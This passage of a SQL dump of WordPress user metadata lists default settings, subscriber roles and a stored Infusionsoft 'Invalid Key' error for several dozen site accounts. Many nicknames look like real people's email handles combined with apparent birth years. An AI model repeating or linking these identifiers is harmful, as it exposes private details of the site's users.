(44477, 3413, 'nickname', 'wilmaryjimenez5211960'),
(44478, 3413, 'first_name', ''),
(44479, 3413, 'last_name', ''),
(44480, 3413, 'description', ''),
(44481, 3413, 'rich_editing', 'true'),
(44482, 3413, 'comment_shortcuts', 'false'),
(44483, 3413, 'admin_color', 'fresh'),
(44484, 3413, 'use_ssl', '0'),
(44485, 3413, 'show_admin_bar_front', 'true'),
(44486, 3413, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44487, 3413, 'cyb_user_level', '0'),
(44488, 3413, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44489, 3413, 'default_password_nag', '1'),
(44490, 3414, 'nickname', 'baileyl241992'),
(44491, 3414, 'first_name', ''),
(44492, 3414, 'last_name', ''),
(44493, 3414, 'description', ''),
(44494, 3414, 'rich_editing', 'true'),
(44495, 3414, 'comment_shortcuts', 'false'),
(44496, 3414, 'admin_color', 'fresh'),
(44497, 3414, 'use_ssl', '0'),
(44498, 3414, 'show_admin_bar_front', 'true'),
(44499, 3414, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44500, 3414, 'cyb_user_level', '0'),
(44501, 3414, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44502, 3414, 'default_password_nag', '1'),
(44503, 3415, 'nickname', 'phonephairy1953'),
(44504, 3415, 'first_name', ''),
(44505, 3415, 'last_name', ''),
(44506, 3415, 'description', ''),
(44507, 3415, 'rich_editing', 'true'),
(44508, 3415, 'comment_shortcuts', 'false'),
(44509, 3415, 'admin_color', 'fresh'),
(44510, 3415, 'use_ssl', '0'),
(44511, 3415, 'show_admin_bar_front', 'true'),
(44512, 3415, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44513, 3415, 'cyb_user_level', '0'),
(44514, 3415, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44515, 3415, 'default_password_nag', '1'),
(44516, 3416, 'nickname', 'davidrobi1231994'),
(44517, 3416, 'first_name', ''),
(44518, 3416, 'last_name', ''),
(44519, 3416, 'description', ''),
(44520, 3416, 'rich_editing', 'true'),
(44521, 3416, 'comment_shortcuts', 'false'),
(44522, 3416, 'admin_color', 'fresh'),
(44523, 3416, 'use_ssl', '0'),
(44524, 3416, 'show_admin_bar_front', 'true'),
(44525, 3416, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44526, 3416, 'cyb_user_level', '0'),
(44527, 3416, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44528, 3416, 'default_password_nag', '1'),
(44529, 3417, 'nickname', 'spc91181988'),
(44530, 3417, 'first_name', ''),
(44531, 3417, 'last_name', ''),
(44532, 3417, 'description', ''),
(44533, 3417, 'rich_editing', 'true'),
(44534, 3417, 'comment_shortcuts', 'false'),
(44535, 3417, 'admin_color', 'fresh'),
(44536, 3417, 'use_ssl', '0'),
(44537, 3417, 'show_admin_bar_front', 'true'),
(44538, 3417, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44539, 3417, 'cyb_user_level', '0'),
(44540, 3417, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44541, 3417, 'default_password_nag', '1'),
(44542, 3418, 'nickname', 'ross.shum1969'),
(44543, 3418, 'first_name', ''),
(44544, 3418, 'last_name', ''),
(44545, 3418, 'description', ''),
(44546, 3418, 'rich_editing', 'true'),
(44547, 3418, 'comment_shortcuts', 'false'),
(44548, 3418, 'admin_color', 'fresh'),
(44549, 3418, 'use_ssl', '0'),
(44550, 3418, 'show_admin_bar_front', 'true'),
(44551, 3418, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44552, 3418, 'cyb_user_level', '0'),
(44553, 3418, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44554, 3418, 'default_password_nag', '1'),
(44555, 3419, 'nickname', 'mshablykoy1983'),
(44556, 3419, 'first_name', ''),
(44557, 3419, 'last_name', ''),
(44558, 3419, 'description', ''),
(44559, 3419, 'rich_editing', 'true'),
(44560, 3419, 'comment_shortcuts', 'false'),
(44561, 3419, 'admin_color', 'fresh'),
(44562, 3419, 'use_ssl', '0'),
(44563, 3419, 'show_admin_bar_front', 'true'),
(44564, 3419, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44565, 3419, 'cyb_user_level', '0'),
(44566, 3419, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44567, 3419, 'default_password_nag', '1'),
(44568, 3420, 'nickname', 'plockhoy1986'),
(44569, 3420, 'first_name', ''),
(44570, 3420, 'last_name', ''),
(44571, 3420, 'description', ''),
(44572, 3420, 'rich_editing', 'true'),
(44573, 3420, 'comment_shortcuts', 'false'),
(44574, 3420, 'admin_color', 'fresh'),
(44575, 3420, 'use_ssl', '0'),
(44576, 3420, 'show_admin_bar_front', 'true'),
(44577, 3420, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44578, 3420, 'cyb_user_level', '0'),
(44579, 3420, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44580, 3420, 'default_password_nag', '1'),
(44581, 3421, 'nickname', 'abrown181987'),
(44582, 3421, 'first_name', ''),
(44583, 3421, 'last_name', ''),
(44584, 3421, 'description', ''),
(44585, 3421, 'rich_editing', 'true'),
(44586, 3421, 'comment_shortcuts', 'false'),
(44587, 3421, 'admin_color', 'fresh'),
(44588, 3421, 'use_ssl', '0'),
(44589, 3421, 'show_admin_bar_front', 'true'),
(44590, 3421, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44591, 3421, 'cyb_user_level', '0'),
(44592, 3421, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44593, 3421, 'default_password_nag', '1'),
(44594, 3422, 'nickname', 'jillykn1952'),
(44595, 3422, 'first_name', ''),
(44596, 3422, 'last_name', ''),
(44597, 3422, 'description', ''),
(44598, 3422, 'rich_editing', 'true'),
(44599, 3422, 'comment_shortcuts', 'false'),
(44600, 3422, 'admin_color', 'fresh'),
(44601, 3422, 'use_ssl', '0'),
(44602, 3422, 'show_admin_bar_front', 'true'),
(44603, 3422, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44604, 3422, 'cyb_user_level', '0'),
(44605, 3422, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44606, 3422, 'default_password_nag', '1'),
(44607, 3423, 'nickname', 'barryascott20001983'),
(44608, 3423, 'first_name', ''),
(44609, 3423, 'last_name', ''),
(44610, 3423, 'description', ''),
(44611, 3423, 'rich_editing', 'true'),
(44612, 3423, 'comment_shortcuts', 'false'),
(44613, 3423, 'admin_color', 'fresh'),
(44614, 3423, 'use_ssl', '0'),
(44615, 3423, 'show_admin_bar_front', 'true'),
(44616, 3423, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44617, 3423, 'cyb_user_level', '0'),
(44618, 3423, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44619, 3423, 'default_password_nag', '1'),
(44620, 3424, 'nickname', 'iti.agarwal71981'),
(44621, 3424, 'first_name', ''),
(44622, 3424, 'last_name', ''),
(44623, 3424, 'description', ''),
(44624, 3424, 'rich_editing', 'true'),
(44625, 3424, 'comment_shortcuts', 'false'),
(44626, 3424, 'admin_color', 'fresh'),
(44627, 3424, 'use_ssl', '0'),
(44628, 3424, 'show_admin_bar_front', 'true'),
(44629, 3424, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44630, 3424, 'cyb_user_level', '0'),
(44631, 3424, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44632, 3424, 'default_password_nag', '1'),
(44633, 3425, 'nickname', 'jpmendez.e1974'),
(44634, 3425, 'first_name', ''),
(44635, 3425, 'last_name', ''),
(44636, 3425, 'description', ''),
(44637, 3425, 'rich_editing', 'true'),
(44638, 3425, 'comment_shortcuts', 'false'),
(44639, 3425, 'admin_color', 'fresh'),
(44640, 3425, 'use_ssl', '0'),
(44641, 3425, 'show_admin_bar_front', 'true'),
(44642, 3425, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44643, 3425, 'cyb_user_level', '0'),
(44644, 3425, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44645, 3425, 'default_password_nag', '1'),
(44646, 3426, 'nickname', 'acker1lt1984'),
(44647, 3426, 'first_name', ''),
(44648, 3426, 'last_name', ''),
(44649, 3426, 'description', ''),
(44650, 3426, 'rich_editing', 'true'),
(44651, 3426, 'comment_shortcuts', 'false'),
(44652, 3426, 'admin_color', 'fresh'),
(44653, 3426, 'use_ssl', '0'),
(44654, 3426, 'show_admin_bar_front', 'true'),
(44655, 3426, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44656, 3426, 'cyb_user_level', '0'),
(44657, 3426, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44658, 3426, 'default_password_nag', '1'),
(44659, 3427, 'nickname', 'shirleyednaples1995'),
(44660, 3427, 'first_name', ''),
(44661, 3427, 'last_name', ''),
(44662, 3427, 'description', ''),
(44663, 3427, 'rich_editing', 'true'),
(44664, 3427, 'comment_shortcuts', 'false'),
(44665, 3427, 'admin_color', 'fresh'),
(44666, 3427, 'use_ssl', '0'),
(44667, 3427, 'show_admin_bar_front', 'true'),
(44668, 3427, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44669, 3427, 'cyb_user_level', '0'),
(44670, 3427, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44671, 3427, 'default_password_nag', '1'),
(44672, 3428, 'nickname', 'akemp8182003'),
(44673, 3428, 'first_name', ''),
(44674, 3428, 'last_name', ''),
(44675, 3428, 'description', ''),
(44676, 3428, 'rich_editing', 'true'),
(44677, 3428, 'comment_shortcuts', 'false'),
(44678, 3428, 'admin_color', 'fresh'),
(44679, 3428, 'use_ssl', '0'),
(44680, 3428, 'show_admin_bar_front', 'true'),
(44681, 3428, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44682, 3428, 'cyb_user_level', '0'),
(44683, 3428, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44684, 3428, 'default_password_nag', '1'),
(44685, 3429, 'nickname', 'joanne_louie1964'),
(44686, 3429, 'first_name', ''),
(44687, 3429, 'last_name', ''),
(44688, 3429, 'description', ''),
(44689, 3429, 'rich_editing', 'true'),
(44690, 3429, 'comment_shortcuts', 'false'),
(44691, 3429, 'admin_color', 'fresh'),
(44692, 3429, 'use_ssl', '0'),
(44693, 3429, 'show_admin_bar_front', 'true'),
(44694, 3429, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44695, 3429, 'cyb_user_level', '0'),
(44696, 3429, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44697, 3429, 'default_password_nag', '1'),
(44703, 3430, 'comment_shortcuts', 'false'),
(44704, 3430, 'admin_color', 'fresh'),
(44705, 3430, 'use_ssl', '0'),
(44706, 3430, 'show_admin_bar_front', 'true'),
(44707, 3430, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44708, 3430, 'cyb_user_level', '0'),
(44709, 3430, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44710, 3430, 'default_password_nag', '1'),
(44711, 3431, 'nickname', 'acaouette1987'),
(44712, 3431, 'first_name', ''),
(44713, 3431, 'last_name', ''),
(44714, 3431, 'description', ''),
(44715, 3431, 'rich_editing', 'true'),
(44716, 3431, 'comment_shortcuts', 'false'),
(44717, 3431, 'admin_color', 'fresh'),
(44718, 3431, 'use_ssl', '0'),
(44719, 3431, 'show_admin_bar_front', 'true'),
(44720, 3431, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44721, 3431, 'cyb_user_level', '0'),
(44722, 3431, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44723, 3431, 'default_password_nag', '1'),
(44724, 3432, 'nickname', 'avelyne_malonzo1954'),
(44725, 3432, 'first_name', ''),
(44726, 3432, 'last_name', ''),
(44727, 3432, 'description', ''),
(44728, 3432, 'rich_editing', 'true'),
(44729, 3432, 'comment_shortcuts', 'false'),
(44730, 3432, 'admin_color', 'fresh'),
(44731, 3432, 'use_ssl', '0'),
(44732, 3432, 'show_admin_bar_front', 'true'),
(44733, 3432, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44734, 3432, 'cyb_user_level', '0'),
(44735, 3432, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44736, 3432, 'default_password_nag', '1'),
(44737, 3433, 'nickname', 'johnandpam1998'),
(44738, 3433, 'first_name', ''),
(44739, 3433, 'last_name', ''),
(44740, 3433, 'description', ''),
(44741, 3433, 'rich_editing', 'true'),
(44742, 3433, 'comment_shortcuts', 'false'),
(44743, 3433, 'admin_color', 'fresh'),
(44744, 3433, 'use_ssl', '0'),
(44745, 3433, 'show_admin_bar_front', 'true'),
(44746, 3433, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44747, 3433, 'cyb_user_level', '0'),
(44748, 3433, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44749, 3433, 'default_password_nag', '1'),
(44750, 3434, 'nickname', 'visiondream541967'),
(44751, 3434, 'first_name', ''),
(44752, 3434, 'last_name', ''),
(44753, 3434, 'description', ''),
(44754, 3434, 'rich_editing', 'true'),
(44755, 3434, 'comment_shortcuts', 'false'),
(44756, 3434, 'admin_color', 'fresh'),
(44757, 3434, 'use_ssl', '0'),
(44758, 3434, 'show_admin_bar_front', 'true'),
(44759, 3434, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44760, 3434, 'cyb_user_level', '0'),
(44761, 3434, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44762, 3434, 'default_password_nag', '1'),
(44763, 3435, 'nickname', 'miller_annabelle1959'),
(44764, 3435, 'first_name', ''),
(44765, 3435, 'last_name', ''),
(44766, 3435, 'description', ''),
(44767, 3435, 'rich_editing', 'true'),
(44768, 3435, 'comment_shortcuts', 'false'),
(44769, 3435, 'admin_color', 'fresh'),
(44770, 3435, 'use_ssl', '0'),
(44771, 3435, 'show_admin_bar_front', 'true'),
(44772, 3435, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44773, 3435, 'cyb_user_level', '0'),
(44774, 3435, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44775, 3435, 'default_password_nag', '1'),
(44776, 3436, 'nickname', 'acc1960'),
(44777, 3436, 'first_name', ''),
(44778, 3436, 'last_name', ''),
(44779, 3436, 'description', ''),
(44780, 3436, 'rich_editing', 'true'),
(44781, 3436, 'comment_shortcuts', 'false'),
(44782, 3436, 'admin_color', 'fresh'),
(44783, 3436, 'use_ssl', '0'),
(44784, 3436, 'show_admin_bar_front', 'true'),
(44785, 3436, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44786, 3436, 'cyb_user_level', '0'),
(44787, 3436, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44788, 3436, 'default_password_nag', '1'),
(44789, 3437, 'nickname', 'lkweekee1980'),
(44790, 3437, 'first_name', ''),
(44791, 3437, 'last_name', ''),
(44792, 3437, 'description', ''),
(44793, 3437, 'rich_editing', 'true'),
(44794, 3437, 'comment_shortcuts', 'false'),
(44795, 3437, 'admin_color', 'fresh'),
(44796, 3437, 'use_ssl', '0'),
(44797, 3437, 'show_admin_bar_front', 'true'),
(44798, 3437, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44799, 3437, 'cyb_user_level', '0'),
(44800, 3437, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44801, 3437, 'default_password_nag', '1'),
(44802, 3438, 'nickname', 'lauragottesman1974'),
(44803, 3438, 'first_name', ''),
(44804, 3438, 'last_name', ''),
(44805, 3438, 'description', ''),
(44806, 3438, 'rich_editing', 'true'),
(44807, 3438, 'comment_shortcuts', 'false'),
(44808, 3438, 'admin_color', 'fresh'),
(44809, 3438, 'use_ssl', '0'),
(44810, 3438, 'show_admin_bar_front', 'true'),
(44811, 3438, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44812, 3438, 'cyb_user_level', '0'),
(44813, 3438, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44814, 3438, 'default_password_nag', '1'),
(44815, 3439, 'nickname', 'vzelaya201959'),
(44816, 3439, 'first_name', ''),
(44817, 3439, 'last_name', ''),
(44818, 3439, 'description', ''),
(44819, 3439, 'rich_editing', 'true'),
(44820, 3439, 'comment_shortcuts', 'false'),
(44821, 3439, 'admin_color', 'fresh'),
(44822, 3439, 'use_ssl', '0'),
(44823, 3439, 'show_admin_bar_front', 'true'),
(44824, 3439, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44825, 3439, 'cyb_user_level', '0'),
(44826, 3439, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44827, 3439, 'default_password_nag', '1'),
(44828, 3440, 'nickname', 'juan.crisantos1989'),
(44829, 3440, 'first_name', ''),
(44830, 3440, 'last_name', ''),
(44831, 3440, 'description', ''),
(44832, 3440, 'rich_editing', 'true'),
(44833, 3440, 'comment_shortcuts', 'false'),
(44834, 3440, 'admin_color', 'fresh'),
(44835, 3440, 'use_ssl', '0'),
(44836, 3440, 'show_admin_bar_front', 'true'),
(44837, 3440, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44838, 3440, 'cyb_user_level', '0'),
(44839, 3440, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44840, 3440, 'default_password_nag', '1'),
(44841, 3441, 'nickname', 'erikhornung1975'),
(44842, 3441, 'first_name', ''),
(44843, 3441, 'last_name', ''),
(44844, 3441, 'description', ''),
(44845, 3441, 'rich_editing', 'true'),
(44846, 3441, 'comment_shortcuts', 'false'),
(44847, 3441, 'admin_color', 'fresh'),
(44848, 3441, 'use_ssl', '0'),
(44849, 3441, 'show_admin_bar_front', 'true'),
(44850, 3441, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44851, 3441, 'cyb_user_level', '0'),
(44852, 3441, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44853, 3441, 'default_password_nag', '1'),
(44854, 3442, 'nickname', 'jennmoyer131996'),
(44855, 3442, 'first_name', ''),
(44856, 3442, 'last_name', ''),
(44857, 3442, 'description', ''),
(44858, 3442, 'rich_editing', 'true'),
(44859, 3442, 'comment_shortcuts', 'false'),
(44860, 3442, 'admin_color', 'fresh'),
(44861, 3442, 'use_ssl', '0'),
(44862, 3442, 'show_admin_bar_front', 'true'),
(44863, 3442, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44864, 3442, 'cyb_user_level', '0'),
(44865, 3442, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44866, 3442, 'default_password_nag', '1'),
(44867, 3443, 'nickname', 'jkjungwirth1961'),
(44868, 3443, 'first_name', ''),
(44869, 3443, 'last_name', ''),
(44870, 3443, 'description', ''),
(44871, 3443, 'rich_editing', 'true'),
(44872, 3443, 'comment_shortcuts', 'false'),
(44873, 3443, 'admin_color', 'fresh'),
(44874, 3443, 'use_ssl', '0'),
(44875, 3443, 'show_admin_bar_front', 'true'),
(44876, 3443, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44877, 3443, 'cyb_user_level', '0'),
(44878, 3443, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44879, 3443, 'default_password_nag', '1'),
(44880, 3444, 'nickname', 'suzanaudrey2000'),
(44881, 3444, 'first_name', ''),
(44882, 3444, 'last_name', ''),
(44883, 3444, 'description', ''),
(44884, 3444, 'rich_editing', 'true'),
(44885, 3444, 'comment_shortcuts', 'false'),
(44886, 3444, 'admin_color', 'fresh'),
(44887, 3444, 'use_ssl', '0'),
(44888, 3444, 'show_admin_bar_front', 'true'),
(44889, 3444, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44890, 3444, 'cyb_user_level', '0'),
(44891, 3444, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44892, 3444, 'default_password_nag', '1'),
(44893, 3445, 'nickname', 'jehrvy1969'),
(44894, 3445, 'first_name', ''),
(44895, 3445, 'last_name', ''),
(44896, 3445, 'description', ''),
(44897, 3445, 'rich_editing', 'true'),
(44898, 3445, 'comment_shortcuts', 'false'),
(44899, 3445, 'admin_color', 'fresh'),
(44900, 3445, 'use_ssl', '0'),
(44901, 3445, 'show_admin_bar_front', 'true'),
(44902, 3445, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44903, 3445, 'cyb_user_level', '0'),
(44904, 3445, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44905, 3445, 'default_password_nag', '1'),
(44906, 3446, 'nickname', 'ghaymans1963'),
(44907, 3446, 'first_name', ''),
(44908, 3446, 'last_name', ''),
(44909, 3446, 'description', ''),
(44910, 3446, 'rich_editing', 'true'),
(44911, 3446, 'comment_shortcuts', 'false'),
(44912, 3446, 'admin_color', 'fresh'),
(44913, 3446, 'use_ssl', '0'),
(44914, 3446, 'show_admin_bar_front', 'true'),
(44915, 3446, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44916, 3446, 'cyb_user_level', '0'),
(44917, 3446, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44918, 3446, 'default_password_nag', '1'),
(44919, 3447, 'nickname', 'justinericmorin2002'),
(44920, 3447, 'first_name', ''),
(44921, 3447, 'last_name', ''),
(44922, 3447, 'description', ''),
(44923, 3447, 'rich_editing', 'true'),
(44924, 3447, 'comment_shortcuts', 'false'),
(44925, 3447, 'admin_color', 'fresh'),
(44926, 3447, 'use_ssl', '0'),
(44927, 3447, 'show_admin_bar_front', 'true'),
(44928, 3447, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44929, 3447, 'cyb_user_level', '0'),
(44930, 3447, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44931, 3447, 'default_password_nag', '1'),
(44932, 3448, 'nickname', 'terravance1973'),
(44933, 3448, 'first_name', ''),
(44934, 3448, 'last_name', ''),
(44935, 3448, 'description', ''),
(44936, 3448, 'rich_editing', 'true'),
(44937, 3448, 'comment_shortcuts', 'false'),
(44938, 3448, 'admin_color', 'fresh'),
(44939, 3448, 'use_ssl', '0'),
(44940, 3448, 'show_admin_bar_front', 'true'),
(44941, 3448, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44942, 3448, 'cyb_user_level', '0'),
(44943, 3448, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44944, 3448, 'default_password_nag', '1'),
(44945, 3449, 'nickname', 'phogneunh2006'),
(44946, 3449, 'first_name', ''),
(44947, 3449, 'last_name', ''),
(44948, 3449, 'description', ''),
(44949, 3449, 'rich_editing', 'true'),
(44950, 3449, 'comment_shortcuts', 'false'),
(44951, 3449, 'admin_color', 'fresh'),
(44952, 3449, 'use_ssl', '0'),
(44953, 3449, 'show_admin_bar_front', 'true'),
(44954, 3449, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44955, 3449, 'cyb_user_level', '0'),
(44956, 3449, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44957, 3449, 'default_password_nag', '1'),
(44958, 3450, 'nickname', 'superlarry141958'),
(44959, 3450, 'first_name', ''),
(44960, 3450, 'last_name', ''),
(44961, 3450, 'description', ''),
(44962, 3450, 'rich_editing', 'true'),
(44963, 3450, 'comment_shortcuts', 'false'),
(44964, 3450, 'admin_color', 'fresh'),
(44965, 3450, 'use_ssl', '0'),
(44966, 3450, 'show_admin_bar_front', 'true'),
(44967, 3450, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(44968, 3450, 'cyb_user_level', '0'),
(44969, 3450, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(44970, 3450, 'default_password_nag', '1'),
(44971, 3451, 'nickname', 'thekevin50011964'),
